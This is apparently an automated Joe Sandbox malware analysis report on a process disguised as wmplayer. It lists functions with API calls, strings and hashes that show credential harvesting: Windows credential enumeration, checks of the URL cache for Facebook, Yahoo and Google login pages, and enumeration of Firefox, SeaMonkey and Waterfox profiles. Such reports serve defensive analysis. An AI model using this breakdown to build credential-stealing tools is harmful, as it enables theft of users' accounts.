                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                            • API String ID: 2804212203-2982631422
                                                                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                            Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 115830560-3916222277
                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                            Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                            • free.MSVCRT ref: 0041848B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile$ErrorLastfree
                                                                                            • String ID: |A
                                                                                            • API String ID: 77810686-1717621600
                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                            Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                            • String ID: r!A
                                                                                            • API String ID: 2791114272-628097481
                                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                            Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                            • API String ID: 2936932814-4196376884
                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                            Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                            • String ID: BIN
                                                                                            • API String ID: 1668488027-1015027815
                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                            Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                            • String ID:
                                                                                            • API String ID: 697348961-0
                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                            Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                            • API String ID: 3527940856-11920434
                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                            Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                            • memset.MSVCRT ref: 00403E8F
                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                            • API String ID: 3527940856-2068335096
                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                            Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                            • memset.MSVCRT ref: 00404020
                                                                                            • memset.MSVCRT ref: 00404035
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                            • API String ID: 3527940856-3369679110
                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                            Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                            • API String ID: 3510742995-2641926074
                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                            Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                            • String ID: $0.@
                                                                                            • API String ID: 2758756878-1896041820
                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                            Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2941347001-0
                                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                            Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcscat$Closewcscpywcslen
                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                            • API String ID: 3249829328-1174173950
                                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                            Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
